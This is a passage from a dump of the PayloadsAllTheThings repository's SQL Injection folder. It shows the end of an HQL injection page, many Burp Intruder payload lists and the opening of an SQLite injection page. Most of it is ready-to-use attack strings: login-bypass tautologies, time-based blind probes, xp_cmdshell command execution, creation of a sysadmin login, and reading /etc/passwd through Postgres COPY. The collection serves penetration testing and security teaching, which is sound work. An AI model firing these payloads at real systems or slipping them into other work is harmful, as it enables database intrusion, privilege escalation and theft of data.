31 | ``` 32 | 33 | ## HQL Error Based 34 | 35 | ```sql 36 | from BlogPosts 37 | where title like '%11' 38 | and (select password from User where username='admin')=1 39 | or ''='%' 40 | and published = true 41 | ``` 42 | 43 | Error based on value casting. 44 | 45 | ```sql 46 | Data conversion error converting "d41d8cd98f00b204e9800998ecf8427e"; SQL statement: 47 | select blogposts0_.id as id18_, blogposts0_.author as author18_, blogposts0_.promotionCode as promotio3_18_, blogposts0_.title as title18_, blogposts0_.visible as visible18_ from BlogPosts blogposts0_ where blogposts0_.title like '%11' and (select user1_.password from User user1_ where user1_.username = 'admin')=1 or ''='%' and blogposts0_.published=1 48 | ``` 49 | 50 | :warning: **HQL does not support UNION queries** 51 | 52 | ## References 53 | 54 | * [HQL for pentesters - February 12, 2014 - Philippe Arteau](https://blog.h3xstream.com/2014/02/hql-for-pentesters.html) 55 | * [How to put a comment into HQL (Hibernate Query Language)? - Thomas Bratt](https://stackoverflow.com/questions/3196975/how-to-put-a-comment-into-hql-hibernate-query-language) 56 | * [HQL : Hyperinsane Query Language - 04/06/2015 - Renaud Dubourguais](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf) 57 | * [ORM2Pwn: Exploiting injections in Hibernate ORM - Nov 26, 2015 - Mikhail Egorov](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm) 58 | * [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/) 59 | -------------------------------------------------------------------------------- /SQL Injection/Images/PostgreSQL_cmd_exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/SQL Injection/Images/PostgreSQL_cmd_exec.png -------------------------------------------------------------------------------- /SQL Injection/Images/Unicode_SQL_injection.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/SQL Injection/Images/Unicode_SQL_injection.png -------------------------------------------------------------------------------- /SQL Injection/Images/wildcard_underscore.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/SQL Injection/Images/wildcard_underscore.jpg -------------------------------------------------------------------------------- /SQL Injection/Intruder/Auth_Bypass.txt: -------------------------------------------------------------------------------- 1 | '-' 2 | ' ' 3 | '&' 4 | '^' 5 | '*' 6 | ' or ''-' 7 | ' or '' ' 8 | ' or ''&' 9 | ' or ''^' 10 | ' or ''*' 11 | "-" 12 | " " 13 | "&" 14 | "^" 15 | "*" 16 | " or ""-" 17 | " or "" " 18 | " or ""&" 19 | " or ""^" 20 | " or ""*" 21 | or true-- 22 | " or true-- 23 | ' or true-- 24 | ") or true-- 25 | ') or true-- 26 | ' or 'x'='x 27 | ') or ('x')=('x 28 | ')) or (('x'))=(('x 29 | " or "x"="x 30 | ") or ("x")=("x 31 | ")) or (("x"))=(("x 32 | or 1=1 33 | or 1=1-- 34 | or 1=1# 35 | or 1=1/* 36 | admin' -- 37 | admin' # 38 | admin'/* 39 | admin' or '1'='1 40 | admin' or '1'='1'-- 41 | admin' or '1'='1'# 42 | admin' or '1'='1'/* 43 | admin'or 1=1 or ''=' 44 | admin' or 1=1 45 | admin' or 1=1-- 46 | admin' or 1=1# 47 | admin' or 1=1/* 48 | admin') or ('1'='1 49 | admin') or ('1'='1'-- 50 | admin') or ('1'='1'# 51 | admin') or ('1'='1'/* 52 | admin') or '1'='1 53 | admin') or '1'='1'-- 54 | admin') or '1'='1'# 55 | admin') or '1'='1'/* 56 | 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 57 | admin" -- 58 | admin" # 59 | admin"/* 60 | admin" or "1"="1 61 | admin" or "1"="1"-- 62 | admin" or "1"="1"# 63 | admin" or "1"="1"/* 64 | admin"or 1=1 or ""=" 65 | admin" or 1=1 66 | admin" or 1=1-- 67 | admin" or 1=1# 68 | admin" or 1=1/* 69 | admin") or ("1"="1 70 | admin") or ("1"="1"-- 71 | admin") or ("1"="1"# 72 | admin") or ("1"="1"/* 73 | admin") or "1"="1 74 | admin") or "1"="1"-- 75 | admin") or "1"="1"# 76 | admin") or "1"="1"/* 77 | 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 78 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/Auth_Bypass2.txt: -------------------------------------------------------------------------------- 1 | == 2 | = 3 | ' 4 | ' -- 5 | ' # 6 | ' – 7 | '-- 8 | '/* 9 | '# 10 | " -- 11 | " # 12 | "/* 13 | ' and 1='1 14 | ' and a='a 15 | or 1=1 16 | or true 17 | ' or ''=' 18 | " or ""=" 19 | 1′) and '1′='1– 20 | ' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 21 | " AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 22 | and 1=1 23 | and 1=1– 24 | ' and 'one'='one 25 | ' and 'one'='one– 26 | ' group by password having 1=1-- 27 | ' group by userid having 1=1-- 28 | ' group by username having 1=1-- 29 | like '%' 30 | or 0=0 -- 31 | or 0=0 # 32 | or 0=0 – 33 | ' or 0=0 # 34 | ' or 0=0 -- 35 | ' or 0=0 # 36 | ' or 0=0 – 37 | " or 0=0 -- 38 | " or 0=0 # 39 | " or 0=0 – 40 | %' or '0'='0 41 | or 1=1 42 | or 1=1-- 43 | or 1=1/* 44 | or 1=1# 45 | or 1=1– 46 | ' or 1=1-- 47 | ' or '1'='1 48 | ' or '1'='1'-- 49 | ' or '1'='1'/* 50 | ' or '1'='1'# 51 | ' or '1′='1 52 | ' or 1=1 53 | ' or 1=1 -- 54 | ' or 1=1 – 55 | ' or 1=1-- 56 | ' or 1=1;# 57 | ' or 1=1/* 58 | ' or 1=1# 59 | ' or 1=1– 60 | ') or '1'='1 61 | ') or '1'='1-- 62 | ') or '1'='1'-- 63 | ') or '1'='1'/* 64 | ') or '1'='1'# 65 | ') or ('1'='1 66 | ') or ('1'='1-- 67 | ') or ('1'='1'-- 68 | ') or ('1'='1'/* 69 | ') or ('1'='1'# 70 | 'or'1=1 71 | 'or'1=1′ 72 | " or "1"="1 73 | " or "1"="1"-- 74 | " or "1"="1"/* 75 | " or "1"="1"# 76 | " or 1=1 77 | " or 1=1 -- 78 | " or 1=1 – 79 | " or 1=1-- 80 | " or 1=1/* 81 | " or 1=1# 82 | " or 1=1– 83 | ") or "1"="1 84 | ") or "1"="1"-- 85 | ") or "1"="1"/* 86 | ") or "1"="1"# 87 | ") or ("1"="1 88 | ") or ("1"="1"-- 89 | ") or ("1"="1"/* 90 | ") or ("1"="1"# 91 | ) or '1′='1– 92 | ) or ('1′='1– 93 | ' or 1=1 LIMIT 1;# 94 | 'or 1=1 or ''=' 95 | "or 1=1 or ""=" 96 | ' or 'a'='a 97 | ' or a=a-- 98 | ' or a=a– 99 | ') or ('a'='a 100 | " or "a"="a 101 | ") or ("a"="a 102 | ') or ('a'='a and hi") or ("a"="a 103 | ' or 'one'='one 104 | ' or 'one'='one– 105 | ' or uid like '% 106 | ' or uname like '% 107 | ' or userid like '% 108 | ' or user like '% 109 | ' or username like '% 110 | ' or 'x'='x 111 | ') or ('x'='x 112 | " or "x"="x 113 | ' OR 'x'='x'#; 114 | '=' 'or' and '=' 'or' 115 | ' UNION ALL SELECT 1, @@version;# 116 | ' UNION ALL SELECT system_user(),user();# 117 | ' UNION select table_schema,table_name FROM information_Schema.tables;# 118 | admin' and substring(password/text(),1,1)='7 119 | ' and substring(password/text(),1,1)='7 120 | ' or 1=1 limit 1 -- -+ 121 | '="or' 122 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MSSQL-WHERE_Time.txt: -------------------------------------------------------------------------------- 1 | waitfor delay '0:0:20' /* 2 | waitfor delay '0:0:20' -- 3 | ' waitfor delay '0:0:20' /* 4 | ' waitfor delay '0:0:20' -- 5 | " waitfor delay '0:0:20' /* 6 | " waitfor delay '0:0:20' -- 7 | ) waitfor delay '0:0:20' /* 8 | ) waitfor delay '0:0:20' -- 9 | )) waitfor delay '0:0:20' /* 10 | )) waitfor delay '0:0:20' -- 11 | ))) waitfor delay '0:0:20' /* 12 | ))) waitfor delay '0:0:20' -- 13 | )))) waitfor delay '0:0:20' /* 14 | )))) waitfor delay '0:0:20' -- 15 | ))))) waitfor delay '0:0:20' -- 16 | )))))) waitfor delay '0:0:20' -- 17 | ') waitfor delay '0:0:20' /* 18 | ') waitfor delay '0:0:20' -- 19 | ") waitfor delay '0:0:20' /* 20 | ") waitfor delay '0:0:20' -- 21 | ')) waitfor delay '0:0:20' /* 22 | ')) waitfor delay '0:0:20' -- 23 | ")) waitfor delay '0:0:20' /* 24 | ")) waitfor delay '0:0:20' -- 25 | '))) waitfor delay '0:0:20' /* 26 | '))) waitfor delay '0:0:20' -- 27 | "))) waitfor delay '0:0:20' /* 28 | "))) waitfor delay '0:0:20' -- 29 | ')))) waitfor delay '0:0:20' /* 30 | ')))) waitfor delay '0:0:20' -- 31 | ")))) waitfor delay '0:0:20' /* 32 | ")))) waitfor delay '0:0:20' -- 33 | '))))) waitfor delay '0:0:20' /* 34 | '))))) waitfor delay '0:0:20' -- 35 | "))))) waitfor delay '0:0:20' /* 36 | "))))) waitfor delay '0:0:20' -- 37 | ')))))) waitfor delay '0:0:20' /* 38 | ')))))) waitfor delay '0:0:20' -- 39 | ")))))) waitfor delay '0:0:20' /* 40 | ")))))) waitfor delay '0:0:20' -- -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MSSQL.txt: -------------------------------------------------------------------------------- 1 | # you will need to customize/modify some of the vaules in the queries for best effect 2 | '; exec master..xp_cmdshell 'ping 10.10.1.2'-- 3 | 'create user name identified by 'pass123' -- 4 | 'create user name identified by pass123 temporary tablespace temp default tablespace users; 5 | ' ; drop table temp -- 6 | 'exec sp_addlogin 'name' , 'password' -- 7 | ' exec sp_addsrvrolemember 'name' , 'sysadmin' -- 8 | ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- 9 | ' grant connect to name; grant resource to name; -- 10 | ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) 11 | ' or 1=1 -- 12 | ' union (select @@version) -- 13 | ' union (select NULL, (select @@version)) -- 14 | ' union (select NULL, NULL, (select @@version)) -- 15 | ' union (select NULL, NULL, NULL, (select @@version)) -- 16 | ' union (select NULL, NULL, NULL, NULL, (select @@version)) -- 17 | ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- 18 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MSSQL_Enumeration.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/SQL Injection/Intruder/FUZZDB_MSSQL_Enumeration.txt -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MYSQL.txt: -------------------------------------------------------------------------------- 1 | 1'1 2 | 1 exec sp_ (or exec xp_) 3 | 1 and 1=1 4 | 1' and 1=(select count(*) from tablenames); -- 5 | 1 or 1=1 6 | 1' or '1'='1 7 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MySQL-WHERE_Time.txt: -------------------------------------------------------------------------------- 1 | and 0=benchmark(3000000,MD5(1))%20/* 2 | and 0=benchmark(3000000,MD5(1))%20-- 3 | and 0=benchmark(3000000,MD5(1))%20%23 4 | ' and 0=benchmark(3000000,MD5(1))%20/* 5 | ' and 0=benchmark(3000000,MD5(1))%20-- 6 | ' and 0=benchmark(3000000,MD5(1))%20%23 7 | " and 0=benchmark(3000000,MD5(1))%20/* 8 | " and 0=benchmark(3000000,MD5(1))%20-- 9 | " and 0=benchmark(3000000,MD5(1))%20%23 10 | ) and 0=benchmark(3000000,MD5(1))%20/* 11 | ) and 0=benchmark(3000000,MD5(1))%20-- 12 | ) and 0=benchmark(3000000,MD5(1))%20%23 13 | )) and 0=benchmark(3000000,MD5(1))%20/* 14 | )) and 0=benchmark(3000000,MD5(1))%20-- 15 | )) and 0=benchmark(3000000,MD5(1))%20%23 16 | ))) and 0=benchmark(3000000,MD5(1))%20/* 17 | ))) and 0=benchmark(3000000,MD5(1))%20-- 18 | ))) and 0=benchmark(3000000,MD5(1))%20%23 19 | )))) and 0=benchmark(3000000,MD5(1))%20/* 20 | )))) and 0=benchmark(3000000,MD5(1))%20-- 21 | )))) and 0=benchmark(3000000,MD5(1))%20%23 22 | ') and 0=benchmark(3000000,MD5(1))%20/* 23 | ') and 0=benchmark(3000000,MD5(1))%20-- 24 | ') and 0=benchmark(3000000,MD5(1))%20%23 25 | ") and 0=benchmark(3000000,MD5(1))%20/* 26 | ") and 0=benchmark(3000000,MD5(1))%20-- 27 | ") and 0=benchmark(3000000,MD5(1))%20%23 28 | ')) and 0=benchmark(3000000,MD5(1))%20/* 29 | ')) and 0=benchmark(3000000,MD5(1))%20-- 30 | ')) and 0=benchmark(3000000,MD5(1))%20%23 31 | ")) and 0=benchmark(3000000,MD5(1))%20/* 32 | ")) and 0=benchmark(3000000,MD5(1))%20-- 33 | ")) and 0=benchmark(3000000,MD5(1))%20%23 34 | '))) and 0=benchmark(3000000,MD5(1))%20/* 35 | '))) and 0=benchmark(3000000,MD5(1))%20-- 36 | '))) and 0=benchmark(3000000,MD5(1))%20%23 37 | "))) and 0=benchmark(3000000,MD5(1))%20/* 38 | "))) and 0=benchmark(3000000,MD5(1))%20-- 39 | "))) and 0=benchmark(3000000,MD5(1))%20%23 40 | ')))) and 0=benchmark(3000000,MD5(1))%20/* 41 | ')))) and 0=benchmark(3000000,MD5(1))%20-- 42 | ')))) and 0=benchmark(3000000,MD5(1))%20%23 43 | ")))) and 0=benchmark(3000000,MD5(1))%20/* 44 | ")))) and 0=benchmark(3000000,MD5(1))%20-- 45 | ")))) and 0=benchmark(3000000,MD5(1))%20%23 -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MySQL_ReadLocalFiles.txt: -------------------------------------------------------------------------------- 1 | # mysql local file disclosure through sqli 2 | # fuzz interesting absolute filepath/filename into 3 | create table myfile (input TEXT); load data infile '' into table myfile; select * from myfile; 4 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_Postgres_Enumeration.txt: -------------------------------------------------------------------------------- 1 | # info disclosure payload fuzzfile for pgsql 2 | select version(); 3 | select current_database(); 4 | select current_user; 5 | select session_user; 6 | select current_setting('log_connections'); 7 | select current_setting('log_statement'); 8 | select current_setting('port'); 9 | select current_setting('password_encryption'); 10 | select current_setting('krb_server_keyfile'); 11 | select current_setting('virtual_host'); 12 | select current_setting('port'); 13 | select current_setting('config_file'); 14 | select current_setting('hba_file'); 15 | select current_setting('data_directory'); 16 | select * from pg_shadow; 17 | select * from pg_group; 18 | create table myfile (input TEXT); 19 | copy myfile from '/etc/passwd'; 20 | select * from myfile;copy myfile to /tmp/test; 21 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/Generic_Fuzz.txt: -------------------------------------------------------------------------------- 1 | 1 2 | 1' 3 | 1" 4 | [1] 5 | 1` 6 | 1\ 7 | 1/*'*/ 8 | 1/*!1111'*/ 9 | 1'||'asd'||' 10 | 1' or '1'='1 11 | 1 or 1=1 12 | 'or''=' -------------------------------------------------------------------------------- /SQL Injection/Intruder/Generic_TimeBased.txt: -------------------------------------------------------------------------------- 1 | # from wapiti 2 | sleep(5)# 3 | 1 or sleep(5)# 4 | " or sleep(5)# 5 | ' or sleep(5)# 6 | " or sleep(5)=" 7 | ' or sleep(5)=' 8 | 1) or sleep(5)# 9 | ") or sleep(5)=" 10 | ') or sleep(5)=' 11 | 1)) or sleep(5)# 12 | ")) or sleep(5)=" 13 | ')) or sleep(5)=' 14 | ;waitfor delay '0:0:5'-- 15 | );waitfor delay '0:0:5'-- 16 | ';waitfor delay '0:0:5'-- 17 | ";waitfor delay '0:0:5'-- 18 | ');waitfor delay '0:0:5'-- 19 | ");waitfor delay '0:0:5'-- 20 | ));waitfor delay '0:0:5'-- 21 | '));waitfor delay '0:0:5'-- 22 | "));waitfor delay '0:0:5'-- 23 | benchmark(10000000,MD5(1))# 24 | 1 or benchmark(10000000,MD5(1))# 25 | " or benchmark(10000000,MD5(1))# 26 | ' or benchmark(10000000,MD5(1))# 27 | 1) or benchmark(10000000,MD5(1))# 28 | ") or benchmark(10000000,MD5(1))# 29 | ') or benchmark(10000000,MD5(1))# 30 | 1)) or benchmark(10000000,MD5(1))# 31 | ")) or benchmark(10000000,MD5(1))# 32 | ')) or benchmark(10000000,MD5(1))# 33 | pg_sleep(5)-- 34 | 1 or pg_sleep(5)-- 35 | " or pg_sleep(5)-- 36 | ' or pg_sleep(5)-- 37 | 1) or pg_sleep(5)-- 38 | ") or pg_sleep(5)-- 39 | ') or pg_sleep(5)-- 40 | 1)) or pg_sleep(5)-- 41 | ")) or pg_sleep(5)-- 42 | ')) or pg_sleep(5)-- 43 | AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe 44 | AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'=' 45 | AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP) 46 | AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)-- 47 | AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)# 48 | SLEEP(5)# 49 | SLEEP(5)-- 50 | SLEEP(5)=" 51 | SLEEP(5)=' 52 | or SLEEP(5) 53 | or SLEEP(5)# 54 | or SLEEP(5)-- 55 | or SLEEP(5)=" 56 | or SLEEP(5)=' 57 | waitfor delay '00:00:05' 58 | waitfor delay '00:00:05'-- 59 | waitfor delay '00:00:05'# 60 | benchmark(50000000,MD5(1)) 61 | benchmark(50000000,MD5(1))-- 62 | benchmark(50000000,MD5(1))# 63 | or benchmark(50000000,MD5(1)) 64 | or benchmark(50000000,MD5(1))-- 65 | or benchmark(50000000,MD5(1))# 66 | pg_SLEEP(5) 67 | pg_SLEEP(5)-- 68 | pg_SLEEP(5)# 69 | or pg_SLEEP(5) 70 | or pg_SLEEP(5)-- 71 | or pg_SLEEP(5)# 72 | '\" 73 | AnD SLEEP(5) 74 | AnD SLEEP(5)-- 75 | AnD SLEEP(5)# 76 | &&SLEEP(5) 77 | &&SLEEP(5)-- 78 | &&SLEEP(5)# 79 | ' AnD SLEEP(5) ANd '1 80 | '&&SLEEP(5)&&'1 81 | ORDER BY SLEEP(5) 82 | ORDER BY SLEEP(5)-- 83 | ORDER BY SLEEP(5)# 84 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj) 85 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj)# 86 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj)-- 87 | +benchmark(3200,SHA1(1))+' 88 | + SLEEP(10) + ' 89 | RANDOMBLOB(500000000/2) 90 | AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) 91 | OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) 92 | RANDOMBLOB(1000000000/2) 93 | AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) 94 | OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) 95 | SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/ 96 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/SQL-Injection: -------------------------------------------------------------------------------- 1 | ' 2 | '' 3 | ` 4 | `` 5 | , 6 | " 7 | "" 8 | / 9 | // 10 | \ 11 | \\ 12 | ; 13 | ' or " 14 | -- or # 15 | ' OR '1 16 | ' OR 1 -- - 17 | " OR "" = " 18 | " OR 1 = 1 -- - 19 | ' OR '' = ' 20 | '=' 21 | 'LIKE' 22 | '=0--+ 23 | OR 1=1 24 | ' OR 'x'='x 25 | ' AND id IS NULL; -- 26 | '''''''''''''UNION SELECT '2 27 | %00 28 | /*…*/ 29 | + addition, concatenate (or space in url) 30 | || (double pipe) concatenate 31 | % wildcard attribute indicator 32 | @variable local variable 33 | @@variable global variable 34 | # Numeric 35 | AND 1 36 | AND 0 37 | AND true 38 | AND false 39 | 1-false 40 | 1-true 41 | 1*56 42 | -2 43 | 1' ORDER BY 1--+ 44 | 1' ORDER BY 2--+ 45 | 1' ORDER BY 3--+ 46 | 1' ORDER BY 1,2--+ 47 | 1' ORDER BY 1,2,3--+ 48 | 1' GROUP BY 1,2,--+ 49 | 1' GROUP BY 1,2,3--+ 50 | ' GROUP BY columnnames having 1=1 -- 51 | -1' UNION SELECT 1,2,3--+ 52 | ' UNION SELECT sum(columnname ) from tablename -- 53 | -1 UNION SELECT 1 INTO @,@ 54 | -1 UNION SELECT 1 INTO @,@,@ 55 | 1 AND (SELECT * FROM Users) = 1 56 | ' AND MID(VERSION(),1,1) = '5'; 57 | ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') -- 58 | Finding the table name 59 | Time-Based: 60 | ,(select * from (select(sleep(10)))a) 61 | %2c(select%20*%20from%20(select(sleep(10)))a) 62 | ';WAITFOR DELAY '0:0:30'-- 63 | Comments: 64 | # Hash comment 65 | /* C-style comment 66 | -- - SQL comment 67 | ;%00 Nullbyte 68 | ` Backtick 69 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/SQLi_Polyglots.txt: -------------------------------------------------------------------------------- 1 | SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/ 2 | SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample 3 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/payloads-sql-blind-MSSQL-WHERE: -------------------------------------------------------------------------------- 1 | waitfor delay '0:0:20' /* 2 | waitfor delay '0:0:20' -- 3 | ' waitfor delay '0:0:20' /* 4 | ' waitfor delay '0:0:20' -- 5 | " waitfor delay '0:0:20' /* 6 | " waitfor delay '0:0:20' -- 7 | ) waitfor delay '0:0:20' /* 8 | ) waitfor delay '0:0:20' -- 9 | )) waitfor delay '0:0:20' /* 10 | )) waitfor delay '0:0:20' -- 11 | ))) waitfor delay '0:0:20' /* 12 | ))) waitfor delay '0:0:20' -- 13 | )))) waitfor delay '0:0:20' /* 14 | )))) waitfor delay '0:0:20' -- 15 | ))))) waitfor delay '0:0:20' -- 16 | )))))) waitfor delay '0:0:20' -- 17 | ') waitfor delay '0:0:20' /* 18 | ') waitfor delay '0:0:20' -- 19 | ") waitfor delay '0:0:20' /* 20 | ") waitfor delay '0:0:20' -- 21 | ')) waitfor delay '0:0:20' /* 22 | ')) waitfor delay '0:0:20' -- 23 | ")) waitfor delay '0:0:20' /* 24 | ")) waitfor delay '0:0:20' -- 25 | '))) waitfor delay '0:0:20' /* 26 | '))) waitfor delay '0:0:20' -- 27 | "))) waitfor delay '0:0:20' /* 28 | "))) waitfor delay '0:0:20' -- 29 | ')))) waitfor delay '0:0:20' /* 30 | ')))) waitfor delay '0:0:20' -- 31 | ")))) waitfor delay '0:0:20' /* 32 | ")))) waitfor delay '0:0:20' -- 33 | '))))) waitfor delay '0:0:20' /* 34 | '))))) waitfor delay '0:0:20' -- 35 | "))))) waitfor delay '0:0:20' /* 36 | "))))) waitfor delay '0:0:20' -- 37 | ')))))) waitfor delay '0:0:20' /* 38 | ')))))) waitfor delay '0:0:20' -- 39 | ")))))) waitfor delay '0:0:20' /* 40 | ")))))) waitfor delay '0:0:20' -- 41 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/payloads-sql-blind-MySQL-ORDER_BY: -------------------------------------------------------------------------------- 1 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 2 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 3 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 4 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 5 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 6 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 7 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 8 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 9 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 10 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 11 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 12 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 13 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 14 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 15 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 16 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 17 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 18 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 19 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/payloads-sql-blind-MySQL-WHERE: -------------------------------------------------------------------------------- 1 | and 0=benchmark(3000000,MD5(1))%20/* 2 | and 0=benchmark(3000000,MD5(1))%20-- 3 | and 0=benchmark(3000000,MD5(1))%20%23 4 | ' and 0=benchmark(3000000,MD5(1))%20/* 5 | ' and 0=benchmark(3000000,MD5(1))%20-- 6 | ' and 0=benchmark(3000000,MD5(1))%20%23 7 | " and 0=benchmark(3000000,MD5(1))%20/* 8 | " and 0=benchmark(3000000,MD5(1))%20-- 9 | " and 0=benchmark(3000000,MD5(1))%20%23 10 | ) and 0=benchmark(3000000,MD5(1))%20/* 11 | ) and 0=benchmark(3000000,MD5(1))%20-- 12 | ) and 0=benchmark(3000000,MD5(1))%20%23 13 | )) and 0=benchmark(3000000,MD5(1))%20/* 14 | )) and 0=benchmark(3000000,MD5(1))%20-- 15 | )) and 0=benchmark(3000000,MD5(1))%20%23 16 | ))) and 0=benchmark(3000000,MD5(1))%20/* 17 | ))) and 0=benchmark(3000000,MD5(1))%20-- 18 | ))) and 0=benchmark(3000000,MD5(1))%20%23 19 | )))) and 0=benchmark(3000000,MD5(1))%20/* 20 | )))) and 0=benchmark(3000000,MD5(1))%20-- 21 | )))) and 0=benchmark(3000000,MD5(1))%20%23 22 | ') and 0=benchmark(3000000,MD5(1))%20/* 23 | ') and 0=benchmark(3000000,MD5(1))%20-- 24 | ') and 0=benchmark(3000000,MD5(1))%20%23 25 | ") and 0=benchmark(3000000,MD5(1))%20/* 26 | ") and 0=benchmark(3000000,MD5(1))%20-- 27 | ") and 0=benchmark(3000000,MD5(1))%20%23 28 | ')) and 0=benchmark(3000000,MD5(1))%20/* 29 | ')) and 0=benchmark(3000000,MD5(1))%20-- 30 | ')) and 0=benchmark(3000000,MD5(1))%20%23 31 | ")) and 0=benchmark(3000000,MD5(1))%20/* 32 | ")) and 0=benchmark(3000000,MD5(1))%20-- 33 | ")) and 0=benchmark(3000000,MD5(1))%20%23 34 | '))) and 0=benchmark(3000000,MD5(1))%20/* 35 | '))) and 0=benchmark(3000000,MD5(1))%20-- 36 | '))) and 0=benchmark(3000000,MD5(1))%20%23 37 | "))) and 0=benchmark(3000000,MD5(1))%20/* 38 | "))) and 0=benchmark(3000000,MD5(1))%20-- 39 | "))) and 0=benchmark(3000000,MD5(1))%20%23 40 | ')))) and 0=benchmark(3000000,MD5(1))%20/* 41 | ')))) and 0=benchmark(3000000,MD5(1))%20-- 42 | ')))) and 0=benchmark(3000000,MD5(1))%20%23 43 | ")))) and 0=benchmark(3000000,MD5(1))%20/* 44 | ")))) and 0=benchmark(3000000,MD5(1))%20-- 45 | ")))) and 0=benchmark(3000000,MD5(1))%20%23 46 | -------------------------------------------------------------------------------- /SQL Injection/SQLite Injection.md: -------------------------------------------------------------------------------- 1 | # SQLite Injection 2 | 3 | ## Summary 4 | 5 | * [SQLite comments](#sqlite-comments) 6 | * [SQLite version](#sqlite-version) 7 | * [Integer/String based - Extract table name](#integerstring-based---extract-table-name) 8 | * [Integer/String based - Extract column name](#integerstring-based---extract-column-name) 9 | * [Boolean - Count number of tables](#boolean---count-number-of-tables) 10 | * [Boolean - Enumerating table name](#boolean---enumerating-table-name) 11 | * [Boolean - Extract info](#boolean---extract-info) 12 | * [Time based](#time-based) 13 | * [Remote Command Execution using SQLite command - Attach 